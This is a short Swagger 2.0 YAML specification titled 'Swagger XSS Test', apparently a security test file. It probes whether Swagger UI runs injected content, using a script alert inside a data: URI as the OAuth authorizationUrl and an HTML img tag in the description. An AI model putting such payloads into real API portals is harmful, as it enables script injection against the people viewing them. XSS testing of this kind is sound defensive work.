swagger: '2.0'
securityDefinitions:
  test:
    type: oauth2
    authorizationUrl: "data:text/html,<script>alert('OAuth XSS')</script>"
info:
  version: "1.0.0"
  title: "Swagger XSS Test"
  description: <img src="https://github.com/coffinxp/img-payloads/blob/main/xss.jpg?raw=true">
paths:
  /test:
    get:
      responses:
        200:
          description: "Test if Swagger UI executes any payloads."
